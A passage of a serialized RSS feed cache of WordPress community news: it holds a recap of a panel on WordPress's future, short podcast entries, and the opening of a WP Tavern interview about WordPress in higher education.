developers?</p>\n\n\n\n<p>This wasn&#8217;t your typical conference panel with rehearsed talking points. The conversation dug into how WordPress is evolving right now—messy bits, growing pains, and all.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n\n\n\n<h2 class=\"wp-block-heading\">Is WordPress headed for &#8220;Legacy&#8221; status?</h2>\n\n\n\n<p>The episode opened with a gut-punch question from a ChatGPT impersonation of a 25-year-old YouTuber: Is WordPress becoming a &#8220;legacy CMS,&#8221; or does it still belong at the cutting edge of web development?</p>\n\n\n\n<p>The panelists weren&#8217;t having it. Birgit jumped straight into the modernization happening right now—Gutenberg&#8217;s evolution, sophisticated admin interfaces, and the shift toward block-based design systems. This isn&#8217;t your grandfather&#8217;s WordPress dashboard.</p>\n\n\n\n<p>Brian kept things grounded: Sure, newer technologies like React and Vite deliver flashy front-end experiences, but guess what? Most projects eventually need a solid content management foundation. WordPress still delivers out-of-the-box content modeling, user authentication, and integrations that would take months to build from scratch elsewhere.</p>\n\n\n\n<h2 class=\"wp-block-heading\">No-Code dreams or developer nightmares?</h2>\n\n\n\n<p>The conversation shifted to whether Full Site Editing and block themes actually simplify web building or just create new headaches for developers.</p>\n\n\n\n<p>Jonathan pushed back on the &#8220;things are getting messier&#8221; narrative. His take? Structured, scalable paradigms always require an adjustment period. It&#8217;s not messier—it&#8217;s different, and that learning curve is normal.</p>\n\n\n\n<p>Birgit shared a telling example: features like custom block styles that once required developer intervention are now accessible to content creators. It&#8217;s empowering non-developers while maintaining professional guardrails—exactly what good tooling should do.</p>\n\n\n\n<p>Brian&#8217;s perspective? The block paradigm creates consistency. More people can build and customize using standardized approaches instead of fighting with fragmented solutions.</p>\n\n\n\n<p>The subtext here: WordPress isn&#8217;t dumbing down. It&#8217;s getting smarter about who can participate in the building process.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Winning over the next generation</h2>\n\n\n\n<p>A big conversation centered on how WordPress stays relevant for younger developers swimming in a sea of shiny new options. Does WordPress still feel fresh? The team didn&#8217;t dodge the question.</p>\n\n\n\n<p>It’s true: WordPress needs to meet new developers where they actually hang out—YouTube tutorials, TikTok quick hits, and mobile-first learning. Gone are the days when developers solely learned from documentation and forums.</p>\n\n\n\n<p>Jonathan hit a key point: WordPress must keep demonstrating its power and possibilities, not just its legacy. Brian backed this up with market reality—there&#8217;s still solid demand for both PHP and React skills within the WordPress ecosystem. The work is there if developers want it.</p>\n\n\n\n<p>But here&#8217;s the proof point that really landed: Birgit shared CERN&#8217;s story—yes, the global research powerhouse—migrating thousands of websites to WordPress. The kicker? Younger developers on their team were leading the charge.</p>\n\n\n\n<p>That&#8217;s not a platform declining. That&#8217;s a platform adapting and attracting fresh talent where it matters most. The question isn&#8217;t whether WordPress can compete for the next generation—it&#8217;s whether we&#8217;re telling that story loud enough.</p>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress and Headless: the reality check</h2>\n\n\n\n<p>Panelists were clear: WordPress has the headless chops with REST API and GraphQL support, but that doesn&#8217;t mean everyone should jump on the bandwagon. Despite the industry buzz, most sites simply don&#8217;t need headless architecture.</p>\n\n\n\n<p>The sweet spot? Clients with significant budgets or organizations treating WordPress as a content hub that feeds multiple touchpoints—other applications, mobile experiences, or external APIs. For everyone else, traditional WordPress delivers faster launch times and simpler maintenance.</p>\n\n\n\n<p>What&#8217;s interesting is the innovation happening on both fronts. Developers are not only exposing WordPress data through REST and GraphQL but also pulling external data sources like Airtable directly into the block editor. That&#8217;s where the real magic happens for most teams.</p>\n\n\n\n<p>In reality, headless setups are complex beasts with multiple failure points and hefty price tags. Traditional WordPress wins the speed-to-market race and keeps maintenance headaches to a minimum.</p>\n\n\n\n<p>The infrastructure is solid, and real projects are shipping, but headless remains the exception rather than the rule. The ecosystem continues doubling down on improving core WordPress while keeping headless as a powerful option when the benefits justify the investment.</p>\n\n\n\n<p>The short version: headless WordPress is a tool, not a mandate. Choose wisely based on your actual needs, not the hype.</p>\n\n\n\n<h2 class=\"wp-block-heading\">AI integration—beyond the buzzword</h2>\n\n\n\n<p>You knew AI would come up—it&#8217;s practically mandatory at every tech event these days. But the panel cut through the noise with some practical reality.</p>\n\n\n\n<p>Here&#8217;s the thing: AI-powered plugins have been around for a while now. The real challenge isn&#8217;t adding more AI features—it&#8217;s creating unified standards and APIs at the Core level. Think image generation, content creation, and debugging tools that actually work together instead of operating in silos.</p>\n\n\n\n<p>Brian nailed the infrastructure angle: WordPress needs to pick standards that balance extensibility with privacy. Not everyone wants their content shipped off to massive cloud-based LLMs, and rightfully so.</p>\n\n\n\n<p>The smart play isn&#8217;t chasing every AI trend that pops up on Product Hunt. It&#8217;s building the foundation that lets developers integrate AI thoughtfully—whether that&#8217;s keeping processing local, giving users control over their data, or ensuring different AI tools can actually talk to each other.</p>\n\n\n\n<p>AI in WordPress isn&#8217;t about being flashy. It&#8217;s about being useful secure and giving users real choice in how they want to leverage these tools. That&#8217;s the kind of AI integration that actually moves the needle.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Will AI replace developers?</h2>\n\n\n\n<p>The panel didn&#8217;t dance around this one: AI makes developers more productive, not obsolete.</p>\n\n\n\n<p>Jonathan kept it real about AI coding assistants like Copilot—they&#8217;re helpful, but they&#8217;re not magic. You still need actual developer expertise to review, modify, and debug what these tools spit out. Anyone who&#8217;s wrestled with AI-generated code knows it&#8217;s not exactly plug-and-play.</p>\n\n\n\n<p>The bottom line? These tools change how we work, not whether we&#8217;re needed. Skilled, creative builders aren&#8217;t going anywhere.</p>\n\n\n\n<h2 class=\"wp-block-heading\">The future: openness, community, and better storytelling</h2>\n\n\n\n<p>As the conversation wound down, the focus shifted to what really drives WordPress forward—community and storytelling.</p>\n\n\n\n<p>Ryan made a solid point: WordPress professionals need to share more of their &#8220;hidden&#8221; case studies and innovations. We&#8217;re not just talking about what&#8217;s happening in plugin repositories, but the real work happening in agencies and institutions worldwide. Those stories matter.</p>\n\n\n\n<p>Both Birgit and Jonathan pushed for more global showcases, bar camps, and informal spaces where grassroots innovation can surface. Because that&#8217;s where the real magic happens—not in conference keynotes, but in the trenches where people are solving actual problems.</p>\n\n\n\n<h2 class=\"wp-block-heading\">The Conclusion</h2>\n\n\n\n<p>The panel&#8217;s take? WordPress is agile, dynamic, and very much alive. With ongoing improvements, strong community engagement, and thoughtful AI integration, the platform looks ready to keep powering the web for the next generation—and beyond.</p>\n\n\n\n<p>Not bad for a 22-year-old platform that some people keep writing off.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2 class=\"wp-block-heading\">Resources: </h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://www.youtube.com/watch?v=e4BGaP5aNuA\">Video on YouTube</a></li>\n\n\n\n<li><a href=\"https://react.dev/\">React</a></li>\n\n\n\n<li><a href=\"https://vite.dev/\">Vite</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/themes/\">Developer Handbook > Themes</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/block-editor/\">Developer Handbook > Block Editor</a></li>\n\n\n\n<li><a href=\"https://wordpress.com/blog/2025/05/07/custom-block-styles/\">Mastering Custom Block Styles in WordPress: 6 Methods for Theme and Plugin Developers</a></li>\n\n\n\n<li><a href=\"https://home.cern/news/announcement/computing/wordpress-now-available-cern-websites\">WordPress now available for CERN websites</a></li>\n\n\n\n<li><a href=\"https://developer.wordpress.org/rest-api/\">Developer Handbook > REST API</a></li>\n\n\n\n<li><a href=\"https://www.wpgraphql.com/\">GraphQL API for WordPress</a></li>\n\n\n\n<li><a href=\"https://remotedatablocks.com/\">Remote Data Blocks</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/ai/2025/07/17/ai-building-blocks/\">AI Building Blocks for WordPress</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/showcase/\">WordPress Showcase </a></li>\n</ul>\n\n\n\n<figure class=\"wp-block-image alignfull size-large\"><a href=\"https://wordpress.org/showcase/\" rel=\" noreferrer noopener\" target=\"_blank\"><img alt=\"\" class=\"wp-image-41854\" height=\"357\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-11-at-14.56.48.png?resize=652%2C357&#038;ssl=1\" width=\"652\" /></a><figcaption class=\"wp-element-caption\">Browse the <strong><a href=\"https://wordpress.org/showcase/\">WordPress Showcase</a></strong></figcaption></figure>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Sep 2025 12:41:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Gutenberg Changelog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"Open Channels FM: The Changing Face of the WordPress Media Landscape and Its Impact on Brands\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109490\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://openchannels.fm/the-changing-face-of-the-wordpress-media-landscape-and-its-impact-on-brands/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:210:\"In this episode, Rae Morey and Adam Weeks dissect the intricate WordPress media landscape, discussing content types, monetization strategies, and effective marketing approaches for creators and companies alike.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Sep 2025 08:22:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: On WP Product Talk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149743\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://ma.tt/2025/09/product-talk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:476:\"<p>I had a great chat with <a href=\"https://www.mattcromwell.com/\">Matt Cromwell</a> and <a href=\"https://www.gravitykit.com/\">Zack Katz</a> on <a href=\"https://wpproducttalk.com/\">WP Product Talk</a> today, mostly about the intersection of AI and WordPress, give it a watch!</p>\n\n\n\n<figure class=\"wp-block-embed alignwide is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 10 Sep 2025 20:59:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"WPTavern: #184 – Rachel Cherry and Alex Aspinall on the State of WordPress in Higher Education\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=199424\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"https://wptavern.com/podcast/184-rachel-cherry-and-alex-aspinall-on-the-state-of-wordpress-in-higher-education\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:58321:\"<details>Transcript<div>\n<p>[00:00:19] <strong>Nathan Wrigley:</strong> Welcome to the Jukebox Podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case, the state of WordPress in higher education.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice, or by going to wptavern.com/feed/podcast, and you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m keen to hear from you and hopefully get you, or your idea, featured on the show. Head to wptavern.com/contact/jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today we have Rachel Cherry and Alex Aspinall.</p>\n\n\n\n<p>Rachel is the founder of WP Campus, a nonprofit organization she launched a decade ago to support professionals using WordPress in higher education. Under her leadership, WP Campus has become a community hub, hosting conferences, and leading research projects tailored to the unique needs of its members. Currently, Rachel serves as the organization&#8217;s Director of Technology, and sits on its board of directors where she continues to drive innovative projects.</p>\n\n\n\n<p>Alex is part of the globally distributed team at Human Made, an established WordPress Enterprise Agency founded in 2011. At Human Made, Alex helps deliver large scale web platforms for major organizations, including names like Harvard, Standard Chartered and PlayStation. In recent years, Alex has developed a strong interest in how WordPress can uniquely serve the higher education sector, and he&#8217;s become especially passionate about exploring and supporting this use case.</p>\n\n\n\n<p>During the podcast, we get into the story behind WP Campus, which has for the past decade been empowering people who use WordPress in colleges and universities. We explore Human Made&#8217;s growing interest in the complexities of higher education projects, from large multi-site networks to the strict accessibility and governance requirements such projects increasingly require.</p>\n\n\n\n<p>The heart of the conversation is the just released State of WordPress in Higher Education 2025 report. We dig into the reports key findings, such as the slow adoption of the block editor and full site editing, the challenges of managing hundreds of university websites with small teams, and why enterprise level tools are in such high demand.</p>\n\n\n\n<p>Whether you&#8217;re a WordPress professional, agency, educator, or are just curious about the unique needs and opportunities the higher education space offers, this episode is for you.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading to wptavern.com/podcast, where you&#8217;ll find all the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Rachel Cherry and Alex Aspinall.</p>\n\n\n\n<p>I am joined on the podcast today by two fabulous guests. I have Rachel Cherry and Alex Aspinall. Hello both. How are you doing?</p>\n\n\n\n<p>[00:03:36] <strong>Rachel Cherry:</strong> I&#8217;m lovely, Nathan. How are you?</p>\n\n\n\n<p>[00:03:38] <strong>Nathan Wrigley:</strong> Good, thank you. And Alex, you all right?</p>\n\n\n\n<p>[00:03:40] <strong>Alex Aspinall:</strong> How are you doing? I&#8217;m great.</p>\n\n\n\n<p>[00:03:41] <strong>Nathan Wrigley:</strong> Thank you so much. So we&#8217;re going to be talking today about the higher ed space, the higher education space, and WordPress. Specifically about WP Campus. In order to establish both of your credentials in this space, I wonder if we could get a little biography from you both, maybe 30 seconds, something like that, just explaining who you are, where you work, what your connection is to WordPress and specifically WP Campus.</p>\n\n\n\n<p>So let&#8217;s go with Rachel first, if you don&#8217;t mind.</p>\n\n\n\n<p>[00:04:05] <strong>Rachel Cherry:</strong> Hi, yes. So I am the founder of WP Campus, which has been around 10 years as of last month, which is kind of wild. And so we are a nonprofit organisation that supports people that use WordPress in higher education. And we host conferences, we host research projects like the one we&#8217;re going to discuss today.</p>\n\n\n\n<p>So currently I am just one of a board of directors and I&#8217;m the director of technology specifically, but I was the lead for this project.</p>\n\n\n\n<p>And then by day I am the accessibility developer at the University of Rochester. And so I&#8217;ve worked in higher ed and other enterprise organisations for the last 18 years.</p>\n\n\n\n<p>[00:04:43] <strong>Nathan Wrigley:</strong> Thank you so much. That&#8217;s great. And Alex.</p>\n\n\n\n<p>[00:04:46] <strong>Alex Aspinall:</strong> I mean, I have way less credentials in terms of my WP Campus presence. I work for Human Made, which is an enterprise WordPress agency. We&#8217;ve been around since 2011, I think.</p>\n\n\n\n<p>We&#8217;re a globally distributed team, people across all continents. And we specialise in building larger scale web platforms for organisations such as Harvard, Standard Chartered, PlayStation, few other names I could throw in there.</p>\n\n\n\n<p>We also have an enterprise hosting solution too. We, probably about a year, two years ago started, well, I personally started becoming really interested in the higher education use case for WordPress. I think it&#8217;s really interesting. I think it&#8217;s quite unique. And that&#8217;s really why Rachel and I started speaking, I don&#8217;t know, maybe 18 months or so ago, and that led us to I guess this podcast.</p>\n\n\n\n<p>[00:05:32] <strong>Nathan Wrigley:</strong> Okay, thank you. So the podcast is going to be framed around a freely available resource, and it&#8217;s called The State of WordPress in Higher Education. I will link in the show notes rather than try to butcher a URL in an audio podcast. I&#8217;ll link in the show notes over at WP Tavern to that and you can freely download it.</p>\n\n\n\n<p>It&#8217;s billed as a research report in the year 2025. I confess, I don&#8217;t know if you did a 2024 version and beyond, but we&#8217;re going to concentrate on the 2025 version.</p>\n\n\n\n<p>But I guess some more preamble, I&#8217;m afraid, but I guess we probably should establish what WP Campus is. And I just want to be clear, we recently released an episode about WP Campus Connect, and so I just want to draw a distinction there. These two things are not the same thing.</p>\n\n\n\n<p>So I&#8217;m going to toss that one to Rachel. Will you just tell us what the endeavor is at WP Campus, why it was set up? What need is it trying to satisfy?</p>\n\n\n\n<p>[00:06:22] <strong>Rachel Cherry:</strong> Yeah, so about 10 years ago I was working in higher education, building WordPress websites, and I wanted my own community. And I was going to a lot of WordCamps and no one was talking about the work that I was doing, the kind of work that I was doing. There wasn&#8217;t a space for my kind of work at camps at the time and so I started this organisation.</p>\n\n\n\n<p>And so for the last 10 years we have worked to build a community of people, of like-minded people, that are using WordPress to support the mission of higher education. And we support each other with professional development, with resources, with connection, and every now and then some advocacy. Years ago we raised funds to do the audit of Gutenberg, accessibility audit to be more specific.</p>\n\n\n\n<p>And so because accessibility is very important in our space, and here was this editor coming round going to cause a lot of change, as it has, and there was this huge unknown of whether or not it was accessible. And that was a very big deal to our group. A lot of our group has policies and such. And so every now and then we do work like that.</p>\n\n\n\n<p>This type of research is very important to our mission as well, to provide data, to provide insight to our community members and our institutions.</p>\n\n\n\n<p>And I think one of our kind of ideals that we stand on is that we want to give people data to inform their own decisions, kind of like with the editor audit. Like, we didn&#8217;t tell people it was inaccessible or accessible, we gave them data so that they can decide for themselves. And so this research, you know, is a big part of that as well.</p>\n\n\n\n<p>There&#8217;s a lot going on in our community right now. And we wanted to pull out this data, and one of our objectives was to better understand the needs and challenges of people using WordPress in higher education.</p>\n\n\n\n<p>[00:08:06] <strong>Nathan Wrigley:</strong> Okay. Thank you for that, Rachel. I&#8217;m going to advise that everybody goes over to the following URL. In fact, pause the podcast right now. If you&#8217;re sitting at a computer or you&#8217;re on your phone, go to wpcampus.org and over there you&#8217;re going to be able to see more about the mission.</p>\n\n\n\n<p>At the moment, the membership numbers are displayed on the website. Whether or not that&#8217;s true when you visit, I don&#8217;t know, but 1,763 members, 688 institutions. That is an impressive number, by the way. I mean, the membership is great, but the institutional count is utterly fabulous. That&#8217;s really impressive.</p>\n\n\n\n<p>But the idea is to juxtapose WordPress and higher ed. We don&#8217;t really use that word in the UK too much. We just kind of generically call things, I think university, so I just want to clear that up. Does higher ed basically service the needs of anybody that&#8217;s left traditional school? So I don&#8217;t know, 18 plus who&#8217;s going through some degree program or something like that?</p>\n\n\n\n<p>[00:08:58] <strong>Rachel Cherry:</strong> Yes. Our mission is really to support kind of that, and I apologise, I can&#8217;t think of the general term. There&#8217;s a kind of a general term that we do use across, that&#8217;s more of a global, because higher ed is very specific to the United States in a lot of ways.</p>\n\n\n\n<p>So we do support kind of that further education. We do have a lot of UK institutions and universities that participate in the work that we do. I would say that our group is largely United States, a lot of UK, a lot of Canadians as well. But we do have folks from all around the world. So it&#8217;s really just that spirit of wanting to support that mission of education.</p>\n\n\n\n<p>Over the years have had a lot of people, even in the kind of K through 12 or early education people, wanting to be involved. And a lot of the things that early education and higher, or later, education have in common, but they&#8217;re also very different. So we haven&#8217;t quite merged with the early education group in that way. But yes, we do support largely this kind of university, higher education context.</p>\n\n\n\n<p>[00:09:59] <strong>Nathan Wrigley:</strong> Okay, thank you. Yeah, that clears that up. I mean, you&#8217;re really busy over there. You&#8217;ve got loads of, I mean, an awful lot going on. There&#8217;s a whole thing about governance. You&#8217;ve got a newsletter, you put on real world events as well as online based events, and a Slack community. And there&#8217;s just a lot going on. It seems like, I don&#8217;t know if this has taken over your life, but it seems like it could well have done.</p>\n\n\n\n<p>[00:10:17] <strong>Rachel Cherry:</strong> It did for a long time, and these days I have a lot more help. For a long time I was really the only director and then a few years back we did the work to implement more of a fleshed out kind of board of directors. And so I&#8217;m just a member of that board now. I am not the director in charge.</p>\n\n\n\n<p>[00:10:34] <strong>Nathan Wrigley:</strong> Yeah, all of that, again, is freely available on the website. You can see who the current custodians of the project are.</p>\n\n\n\n<p>So where does Human Made, Alex, where does Human Made fit into this piece of the puzzle? How, have you become involved?</p>\n\n\n\n<p>[00:10:45] <strong>Alex Aspinall:</strong> Yeah, I guess it goes back to what I was saying a little bit before about, I was just personally really interested in the higher ed use case of WordPress, and started digging around into learning a bit more about what kind of projects people had on the go, and what kind of platforms were being built in the space. They&#8217;re diverse, they&#8217;re complicated, they&#8217;re multi-site, you know, interesting, I guess is why I started getting involved.</p>\n\n\n\n<p>Human Made is one of the agencies that builds complex, larger projects, so there&#8217;s a fit there as well. So we started looking around the space, seeing who it might be interesting to talk to, just in terms of learning a bit more. Obviously Rachel and WP Campus. We started talking informally about just the experience of being in WordPress in higher education.</p>\n\n\n\n<p>I think the first thing we collaborated on over a year ago now was we did an online conference in the run up to WP Campus&#8217; IRL conference a couple of weeks later. And then after that we enjoyed working together, we thought there was a lot more material we could work on, and this research project, I suppose was the biggest idea that came out of those discussions following that.</p>\n\n\n\n<p>[00:11:52] <strong>Nathan Wrigley:</strong> Okay. So I&#8217;ve downloaded the report and I&#8217;ve had a thorough look through it. There&#8217;s an awful lot in here actually. It is available, like I said, I&#8217;ll link to it in the show notes. However, I have to say, it&#8217;s a very graphical thing that we&#8217;re going to be talking about. There&#8217;s loads of charts kind of explaining the percentages in many cases of one thing versus another. So you will probably get more out of this podcast if you have downloaded it, and had a little peruse.</p>\n\n\n\n<p>It doesn&#8217;t really matter who wants to take this, but I&#8217;m going to ask one of you to sort of explain what are some of the curious findings that you&#8217;ve got? Maybe the one, two, or three top level items that you think might be of great interest, and then we can maybe dig into the weeds of those particular things. So anything that your intuition suggests as something our audience might be interested in.</p>\n\n\n\n<p>[00:12:32] <strong>Rachel Cherry:</strong> I&#8217;ll start with like my key takeaways, which are very broad, and then dive into a few of the data points. But my two key takeaways that I reported on was that our higher ed teams need more resources, and a way to share more resources, and that higher education needs more enterprise features in the WordPress product. Those were kind of my two, like looking at the data, my two takeaways. And at our report presentation that we had recently, we talked about that with folks in the community.</p>\n\n\n\n<p>But some of the really interesting questions that we asked were around usage of the block editor and full site editing. And so nothing super surprising. But let me pull up that particular chart really quick.</p>\n\n\n\n<p>So we asked folks, how fully have you adopted the block editor and full site editing? And only 40% of the respondents are using it on all of their sites. And there was a range there. Like we asked, are you using it on all of them? Are you using it on like most of them? Alex touched on this earlier, higher ed is a very interesting space, and the thing that I, people used to hear me say frequently was that WordPress and higher ed is WordPress in the enterprise on a budget. And what that usually means is a lot of under-resourced teams having to use WordPress to solve these large scale enterprise, high user environments.</p>\n\n\n\n<p>What comes out of that is very creative, very custom, very interesting, complex solutions. This is kind of tying back to my takeaway of people need more resources and they need ways to share them. Because something that is also interesting in our space is how much custom work there is. How much people are solving the same problems, but they&#8217;re solving them on their own, and they don&#8217;t have a way to really share them. It takes a lot of energy to like maintain a public plugin that gets used around. And so because these plugins are usually so custom that creates this whole challenge.</p>\n\n\n\n<p>So anyway, back to the block editor. So when you&#8217;re trying to introduce new functionality in these complex enterprise environments, it can take a while. Higher ed is usually, it&#8217;s usually a pretty slow train of adoption, and there are reasons. And a big reason for that is resources. And you&#8217;re not just going to turn around and add the block editor on because you&#8217;re probably managing like 300 websites, and you can&#8217;t just change the editing experience without changing all of your training materials, and without changing your governance.</p>\n\n\n\n<p>So yeah, so there&#8217;s context to why, and there&#8217;s lots of reasons. There&#8217;s other reasons that we don&#8217;t really dive into in these numbers, but there&#8217;s context that goes into why only 40% are actually using it on all their sites, even though Gutenberg came out in 2019.</p>\n\n\n\n<p>[00:15:28] <strong>Nathan Wrigley:</strong> Can I just ask you a quick question? You said something which took my breath away there. You said these people are managing probably 300 websites. I didn&#8217;t see that in the report anyway, and that seems like a really surprising number. How does that map to an institution? Is it because there&#8217;s a website for, I don&#8217;t know, the geography department, and then there&#8217;s another one for the sociology department? Is that what&#8217;s going on there? Because 300 seems like, well, I mean you could run your entire agency and not have 300 websites under your custodianship. So what&#8217;s going on there? You dropped that number and I was really surprised by it.</p>\n\n\n\n<p>[00:16:01] <strong>Rachel Cherry:</strong> Yes, in higher ed, there is a website for everything. And there is the notion of, if you&#8217;re familiar with domain of one&#8217;s own, which is a concept actually introduced in, or invented in, higher education in the States. And what it really means in our context is that people will set up WordPress multi-sites and then let people create their own sites on it.</p>\n\n\n\n<p>And they&#8217;re largely blogs, like a faculty member&#8217;s blog or a research lab&#8217;s blog. But it&#8217;s a way to allow the sharing and the spreading of information and research in higher ed with kind of a low service effort.</p>\n\n\n\n<p>So like you can log on and you have like two template choices or two theme choices, and then you&#8217;re responsible for kind of managing a site on there. And then they try to, you know, build this domain in a way that&#8217;s kind of reusable code and plugins, like you do in WordPress. So yeah, you can get a lot of sites going.</p>\n\n\n\n<p>[00:16:54] <strong>Nathan Wrigley:</strong> Yeah, that&#8217;s absolutely fascinating. I hadn&#8217;t really thought about it as, well, for example, if I go to a university website here and I end up at the Department of Geography, I&#8217;m kind of thinking it&#8217;s the same website, but I imagine, you&#8217;re right, it&#8217;s a whole different team of staff that are logging in and doing the geography stuff than they would be elsewhere.</p>\n\n\n\n<p>Okay, so that&#8217;s curious. Right, back to the points that you mentioned, the resources. When you say that universities, I&#8217;m just going to use the word university, when you say that these institutions have limited resources, it kind of feels like the funding model in the US is very different to one that we have in the UK, and possibly different parts of the world.</p>\n\n\n\n<p>And it always feels as if the US institutions probably have more money, but I&#8217;m probably thinking of things like the Ivy League universities where the fees are very high, but that probably doesn&#8217;t map all over the place.</p>\n\n\n\n<p>So when you say resources, are you talking about cash, them being strapped for cash, or are you talking about human beings? You know, there&#8217;s not enough boots on the ground, if you like, or maybe it&#8217;s a confection of 